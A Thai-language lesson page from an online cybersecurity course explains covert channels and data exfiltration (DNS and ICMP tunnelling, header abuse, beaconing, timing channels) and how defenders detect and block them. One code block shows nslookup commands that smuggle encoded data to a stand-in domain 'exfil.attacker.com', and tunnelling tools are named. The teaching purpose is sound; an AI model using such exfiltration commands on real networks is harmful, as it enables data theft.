Cyber Security Academy · บทเรียน

ช่องทางลับและการลักลอบนำข้อมูลออก

ผู้โจมตีลักลอบนำข้อมูลออกไปอย่างไร

บทเรียน 4 จาก 413 ขั้นตอน

ช่องทางลับและการลักลอบนำข้อมูลออก เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

ช่องทางลับคืออะไร

ช่องทางลับ คือเส้นทางสื่อสารที่ถ่ายโอนข้อมูลในลักษณะที่ระบบไม่ได้ออกแบบมาให้อนุญาต จึงหลบเลี่ยงการควบคุมความปลอดภัย ขณะที่เทคนิคการซ่อนข้อมูลซ่อนข้อมูลไว้ในไฟล์ ช่องทางลับซ่อนข้อมูลไว้ใน พฤติกรรมของระบบหรือการรับส่งข้อมูลเครือข่าย

ผู้โจมตีใช้ช่องทางลับเพื่อ ลักลอบนำข้อมูลออก ซึ่งหมายถึงการนำข้อมูลที่ขโมยออกจากเครือข่าย และใช้สำหรับ การสั่งการและควบคุม (ซีทู) เพื่อรับคำสั่ง ลักษณะสำคัญคือการรับส่งข้อมูลดูเหมือนถูกต้องตามปกติ จึงหลุดผ่านไฟร์วอลล์ พร็อกซี และระบบป้องกันข้อมูลสูญหายได้

การทำความเข้าใจช่องทางเหล่านี้เป็นสิ่งจำเป็นต่อการตรวจจับขั้นตอนสุดท้ายที่สร้างความเสียหายมากที่สุดของการโจมตี นั่นคือข้อมูลกำลังออกจากองค์กร

ช่องทางจัดเก็บเทียบกับช่องทางตามเวลา

ช่องทางลับแบ่งออกเป็นสองประเภทพื้นฐาน:

  • ช่องทางจัดเก็บ ซ่อนข้อมูลไว้ในฟิลด์หรือสถานที่ที่ไม่ได้มีไว้สำหรับบรรจุข้อมูล เช่น บิตส่วนหัวที่ไม่ได้ใช้ หรือค่าที่ผู้สังเกตสามารถอ่านได้โดยตรง
  • ช่องทางตามเวลา เข้ารหัสข้อมูลไว้ใน จังหวะเวลา ของเหตุการณ์ เช่น ความล่าช้าระหว่างแพ็กเก็ต ลำดับของคำขอ หรือเวลาแฝงของการตอบกลับ ไม่มีการเปลี่ยนแปลงฟิลด์ข้อมูล ข้อมูลอยู่ที่ เมื่อใด ที่เหตุการณ์เกิดขึ้น

ช่องทางตามเวลาพรางตัวได้ดีกว่าและตรวจจับได้ยากกว่า เพราะตัวแพ็กเก็ตเองดูเป็นปกติทั้งหมด มีเพียงจังหวะของมันเท่านั้นที่เก็บความลับไว้

การลักลอบนำข้อมูลออกผ่าน DNS

ช่องทางลับที่พบได้บ่อยที่สุดในโลกจริงใช้ประโยชน์จาก DNS โดยปกติแล้วเครือข่ายจะอนุญาตให้ส่ง DNS ออกไปได้ แม้เป็นเครือข่ายที่จำกัดเข้มงวด เพราะการแปลงชื่อเป็นสิ่งจำเป็น ผู้โจมตีจึงใช้ประโยชน์จากจุดนี้

ข้อมูลจะถูกเข้ารหัสลงใน ป้ายชื่อโดเมนย่อยของคำขอที่ส่งไปยังโดเมนซึ่งผู้โจมตีควบคุม เซิร์ฟเวอร์ชื่อหลักของโดเมนที่ผู้โจมตีควบคุมจะรับและถอดรหัสข้อมูลเหล่านั้น ข้อมูลที่ขโมยจะไหลออกไปทีละคำขอ DNS:

เครื่องมืออย่าง ไอโอดีน และ ดีเอ็นเอสแคตทู ช่วยสร้างอุโมงค์เต็มรูปแบบผ่าน DNS โดยอัตโนมัติ

# Each query smuggles a chunk of base32-encoded stolen data
# in the subdomain; the attacker's DNS server decodes it.
nslookup 4a6f686e446f652e.exfil.attacker.com
nslookup 5365637265744461.exfil.attacker.com
# Looks like ordinary DNS lookups to most monitoring.

การตรวจจับการทำทันเนลผ่าน DNS

การลักลอบนำข้อมูลออกผ่าน DNS ทิ้งร่องรอยทางสถิติที่ผู้ป้องกันสามารถค้นหาได้:

  • ปริมาณคำขอสูง ไปยังโดเมนเดียว สูงกว่าระดับปกติมาก
  • โดเมนย่อยยาวที่มีเอนโทรปีสูง ข้อมูลที่เข้ารหัสดูสุ่ม ต่างจากชื่อโฮสต์จริง
  • ประเภทระเบียนที่ผิดปกติ มีการใช้ระเบียน TXT, NULL หรือ CNAME อย่างหนัก
  • ขนาดการตอบกลับใหญ่ สำหรับการสั่งการและควบคุมขาเข้า
  • โดเมนที่พบได้น้อย มีโฮสต์เพียงเครื่องเดียวที่ส่งคำขอไป

การตรวจสอบบันทึก DNS เพื่อหารูปแบบเหล่านี้และป้อนข้อมูลเข้าสู่ SIEM เป็นหนึ่งในการตรวจจับที่คุ้มค่าที่สุด เพราะการลักลอบนำข้อมูลออกเกือบทั้งหมดจะเกี่ยวข้องกับ DNS ในท้ายที่สุด

การใช้ฟิลด์โพรโทคอลในทางที่ผิด

โพรโทคอลจำนวนมากมีฟิลด์ที่เป็นตัวเลือก สงวนไว้ หรือถูกตรวจสอบอย่างหละหลวม จึงเหมาะเป็นช่องทางจัดเก็บอย่างยิ่ง:

  • การทำทันเนลผ่าน ICMP ซ่อนข้อมูลไว้ในข้อมูลบรรจุของแพ็กเก็ต ping ซึ่งไฟร์วอลล์มักอนุญาต
  • ฟิลด์ส่วนหัว TCP/IP เช่น ฟิลด์ระบุเอกลักษณ์ของ IP หมายเลขลำดับของ TCP หรือบิตแฟล็กที่สงวนไว้
  • ส่วนหัวเอชทีทีพี เช่น ส่วนหัวแบบกำหนดเอง คุกกี้ หรือสตริงตัวแทนผู้ใช้ที่บรรจุข้อมูลเข้ารหัส
  • TLS SNI ซึ่งเป็นฟิลด์ชื่อเซิร์ฟเวอร์ และบางครั้งถูกใช้ในทางที่ผิดเพื่อส่งสัญญาณไปยังเซิร์ฟเวอร์การสั่งการและควบคุม

แต่ละฟิลด์ดูเป็นปกติเมื่อพิจารณาแยกกัน การตรวจจับจึงต้องกำหนดค่าฐานว่าค่าที่ ปกติ ควรเป็นอย่างไร และแจ้งเตือนเมื่อพบความเบี่ยงเบน

# ICMP tunnel: stolen bytes ride in the ping payload
# ping normally sends a fixed pattern; a tunnel sends data instead.
# Tools like icmptunnel/ptunnel automate this.
# Detect: unusual ICMP payload size, entropy, or volume.

การแฝงตัวในการรับส่งข้อมูลที่อนุญาต

ผู้โจมตีที่มีความซับซ้อนมักเลือกช่องทางที่ซ่อนอยู่ในการรับส่งข้อมูลที่ ได้รับอนุญาตและเข้ารหัส เพื่อให้ผ่านการตรวจสอบเชิงลึกได้:

  • การสั่งการและควบคุมผ่านเอชทีทีพีเอส ส่งสัญญาณที่ปลอมเป็นคำขอเว็บทั่วไปไปยังโดเมนที่ดูน่าเชื่อถือ
  • การบังหน้าโดเมน กำหนดเส้นทางการรับส่งข้อมูลผ่าน CDN ที่เชื่อถือได้ ทำให้ปลายทางที่มองเห็นดูไม่เป็นอันตราย
  • การใช้พื้นที่เก็บข้อมูลบนคลาวด์ในทางที่ผิด ลักลอบนำข้อมูลไปยังดรอปบ็อกซ์ เอสทรี หรือกูเกิลไดรฟ์ ซึ่งองค์กรส่วนใหญ่อนุญาต
  • สื่อสังคมออนไลน์และบริการแปะข้อความ โพสต์ข้อมูลที่เข้ารหัสไปยังบริการสาธารณะ

เนื่องจากปลายทางและการเข้ารหัสดูถูกต้องตามปกติ การตรวจจับจึงเปลี่ยนจากการตรวจสอบเนื้อหาไปเป็น พฤติกรรม เช่น รูปแบบการส่งสัญญาณกลับบ้าน ปริมาณ และจังหวะเวลา

รูปแบบการส่งสัญญาณกลับบ้าน

ช่องทางการสั่งการและควบคุมมัก ส่งสัญญาณกลับบ้าน ตามช่วงเวลาปกติเพื่อตรวจสอบคำสั่ง ความสม่ำเสมอนี้เป็นพฤติกรรมที่ตรวจจับได้ แม้ข้อมูลจะถูกเข้ารหัส:

  • ความเป็นคาบ การเชื่อมต่อเกิดขึ้นในช่วงเวลาเกือบคงที่ เช่น ทุก 60 วินาทีหรือทุกชั่วโมง
  • ความคลาดเคลื่อนของช่วงเวลา ผู้โจมตีเพิ่มความสุ่มเพื่อหลบเลี่ยงการตรวจจับคาบแบบง่าย แต่จังหวะพื้นฐานมักยังคงมองเห็นได้ทางสถิติ
  • ข้อมูลขนาดเล็กและสม่ำเสมอ คำขอขนาดเล็กแบบสัญญาณชีพ

ผู้ป้องกันใช้การวิเคราะห์การรับส่งข้อมูลเพื่อสังเกตความสม่ำเสมอแบบเครื่องจักรของการส่งสัญญาณกลับบ้าน ซึ่งการท่องเว็บของมนุษย์ไม่เคยก่อให้เกิด

เจาะลึกช่องทางตามเวลา

ช่องทางด้านเวลาโดยแท้เข้ารหัสข้อมูลโดยไม่เปลี่ยนแปลงฟิลด์ข้อมูลใด ๆ ตัวอย่างเช่น:

  • ช่วงหน่วงระหว่างแพ็กเก็ต ช่องว่างสั้นหมายถึง 0 ช่องว่างยาวหมายถึง 1
  • ลำดับคำขอ ลำดับที่มีการขอทรัพยากรใช้แทนบิตข้อมูล
  • การปรับอัตราการส่งผ่าน การเปลี่ยนอัตราของทราฟฟิกที่ถูกต้องตามปกติ

ช่องทางเหล่านี้ทำงานช้า (แบนด์วิดท์ต่ำ) และมีสัญญาณรบกวน แต่พรางตัวได้แนบเนียนอย่างยิ่งเพราะแพ็กเก็ตเป็นของจริง การตรวจจับช่องทางเหล่านี้ต้องใช้การวิเคราะห์ทางสถิติของการกระจายช่วงเวลา เพื่อค้นหาความหน่วงที่เป็นแบบแผนผิดธรรมชาติหรือมีสองโหมด ซึ่งทราฟฟิกจากมนุษย์และเครื่องจักรโดยปกติจะไม่ก่อให้เกิด

การตรวจจับ: การวิเคราะห์พฤติกรรมเครือข่าย

เนื่องจากช่องทางลับเลียนแบบทราฟฟิกที่ถูกต้องตามปกติ การตรวจจับจึงอาศัย การวิเคราะห์พฤติกรรม แทนลายเซ็น:

  • การสร้างเส้นฐาน เรียนรู้ทราฟฟิกปกติของแต่ละโฮสต์ แล้วทำเครื่องหมายความเบี่ยงเบน
  • ความผิดปกติของปริมาณ คอมพิวเตอร์ทำงานเครื่องหนึ่งจู่ ๆ ก็อัปโหลดข้อมูลหลายกิกะไบต์
  • การวิเคราะห์เอนโทรปี ข้อมูลเนื้อหาที่มีความสุ่มสูงบ่งชี้การเข้ารหัสหรือการแปลงรูปแบบ
  • ชื่อเสียงของปลายทาง การเชื่อมต่อไปยังโดเมนใหม่ โดเมนที่พบไม่บ่อย หรือโดเมนที่จดทะเบียนเมื่อไม่นานมานี้
  • ความสอดคล้องกับโพรโทคอล ทราฟฟิกบนพอร์ตที่ไม่ตรงกับโพรโทคอลที่คาดหมาย

NIDS การวิเคราะห์ NetFlow และ SIEM ร่วมกันช่วยเผยสัญญาณเหล่านี้ ไม่มีตัวบ่งชี้ใดเพียงตัวเดียวที่ยืนยันได้เด็ดขาด

# NetFlow/Zeek-style hunting questions:
# - Which host has the highest outbound byte volume this week?
# - Which destinations are queried by exactly one internal host?
# - Which connections recur at near-constant intervals (beaconing)?
# - Where does the payload entropy approach maximum (encrypted tunnel)?

มาตรการป้องกัน

นอกเหนือจากการตรวจจับแล้ว มาตรการหลายอย่างยังช่วยลดพื้นที่สำหรับช่องทางลับ:

  • การกรองทราฟฟิกขาออก ปฏิเสธทราฟฟิกขาออกเป็นค่าเริ่มต้น อนุญาตเฉพาะปลายทางและพอร์ตที่จำเป็น มาตรการนี้เพียงอย่างเดียวก็ปิดกั้นช่องทางได้มากมาย
  • การตรวจสอบ DNS บังคับให้ DNS ทั้งหมดผ่านตัวแก้ไขชื่อที่มีการตรวจติดตาม และบล็อก DNS ขาออกโดยตรง
  • การตรวจสอบ TLS ในกรณีที่เหมาะสมตามกฎหมายและการปฏิบัติงาน ให้ถอดรหัสและตรวจสอบ TLS ขาออก
  • การป้องกันข้อมูลสูญหาย จัดประเภทข้อมูลสำคัญและเฝ้าดูการนำข้อมูลเหล่านั้นออกไป
  • การจำกัดอัตราและการส่งผ่านพร็อกซี รวมทราฟฟิกขาออกทั้งหมดผ่านพร็อกซีที่ควบคุมและมีการบันทึก

มาตรการหลายชั้นเปลี่ยนการลักลอบนำข้อมูลออกที่ทำได้ง่ายให้กลายเป็นการดิ้นรนที่มีสัญญาณรบกวนและตรวจจับได้

ห่วงโซ่การโจมตีเพื่อการลักลอบนำข้อมูลออก

การลักลอบนำข้อมูลออกเป็นขั้นตอนสุดท้ายของการบุกรุก ดังนั้นการตรวจจับจึงช่วยจำกัดความเสียหายได้ แม้ว่าการป้องกันก่อนหน้านี้จะล้มเหลวแล้วก็ตาม ให้จับคู่มาตรการของคุณกับขั้นตอนของผู้โจมตี:

  • การรวบรวม ข้อมูลถูกนำมารวบรวมไว้ภายใน ให้เฝ้าระวังการรวมข้อมูลที่ผิดปกติ
  • การแปลงรูปแบบ/การเข้ารหัส ข้อมูลถูกบีบอัดและทำให้คลุมเครือ ค่าเอนโทรปีพุ่งสูงขึ้น
  • การเลือกช่องทาง ผู้โจมตีเลือก DNS การสื่อสารเว็บแบบเข้ารหัส หรือการส่งข้อมูลออกผ่านระบบคลาวด์ การตรวจติดตามทราฟฟิกขาออกจึงสำคัญ
  • การถ่ายโอน เมื่อข้อมูลถูกส่งออกไป จะปรากฏความผิดปกติของปริมาณและการส่งสัญญาณเป็นระยะ

การป้องกันหลายชั้นตลอดขั้นตอนเหล่านี้หมายความว่าผู้โจมตีต้องเอาชนะทุกชั้น ขณะที่คุณเพียงต้องจับผู้โจมตีให้ได้ที่ชั้นใดชั้นหนึ่ง

ตรวจสอบความเข้าใจ

ทดสอบความเข้าใจเกี่ยวกับการลักลอบนำข้อมูลออกผ่าน DNS

ทบทวน: ช่องทางลับและการลักลอบนำข้อมูลออก

คุณได้เรียนรู้วิธีที่ผู้โจมตีลักลอบนำข้อมูลออกไป และวิธีตรวจจับพวกเขา

  • ช่องทางลับ ซ่อนข้อมูลไว้ในพฤติกรรมของระบบหรือทราฟฟิกเครือข่าย หลบเลี่ยงไฟร์วอลล์และ DLP และถูกใช้เพื่อการลักลอบนำข้อมูลออกและการควบคุมสั่งการ
  • ช่องทางมีทั้งแบบ จัดเก็บ (ซ่อนอยู่ในฟิลด์) และแบบ จังหวะเวลา (ซ่อนอยู่ในจังหวะเวลาของเหตุการณ์ จึงพรางตัวได้แนบเนียนกว่า)
  • การลักลอบนำข้อมูลออกผ่าน DNS เป็นรูปแบบที่พบมากที่สุด โดยเข้ารหัสข้อมูลไว้ในโดเมนย่อย ตรวจจับได้จากการวิเคราะห์ปริมาณ เอนโทรปี และโดเมนที่พบได้ยาก
  • ผู้โจมตีใช้ฟิลด์ของโพรโทคอลในทางที่ผิด (ICMP และส่วนหัว) และกลมกลืนไปกับ ทราฟฟิกเข้ารหัสที่ได้รับอนุญาต (การควบคุมสั่งการผ่านการสื่อสารเว็บแบบเข้ารหัส ที่เก็บข้อมูลบนคลาวด์ และการบังหน้าด้วยโดเมน)
  • การส่งสัญญาณเป็นระยะที่มีความสม่ำเสมอและความผิดปกติทางพฤติกรรมช่วยเปิดเผยช่องทางได้ แม้จะมีการเข้ารหัส
  • ป้องกันด้วย การกรองทราฟฟิกขาออก การตรวจสอบ DNS/TLS, DLP และการตรวจจับหลายชั้นตลอดห่วงโซ่การโจมตีเพื่อการลักลอบนำข้อมูลออก

หลักสูตรการอำพรางข้อมูลและการซ่อนข้อมูลนี้จบลงแล้ว

เริ่มต้นได้ฟรี

เรียนรู้ Cyber Security Academy ด้วย AI tutor — ฟรี

เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป

คอร์ส
76
บทเรียน
303

คำถามที่พบบ่อย

บทเรียน “ช่องทางลับและการลักลอบนำข้อมูลออก” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “ช่องทางลับและการลักลอบนำข้อมูลออก” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “ช่องทางลับและการลักลอบนำข้อมูลออก”

ผู้โจมตีลักลอบนำข้อมูลออกไปอย่างไร คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน

บทเรียน “ช่องทางลับและการลักลอบนำข้อมูลออก” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สเตกาโนกราฟีคืออะไร
  2. สเตกาโนกราฟีในรูปภาพและเสียง
  3. การตรวจจับข้อมูลซ่อนเร้น (สเตกาโนอะนาไลซิส)
  4. ช่องทางลับและการลักลอบนำข้อมูลออก
← กลับไปที่ Cyber Security Academy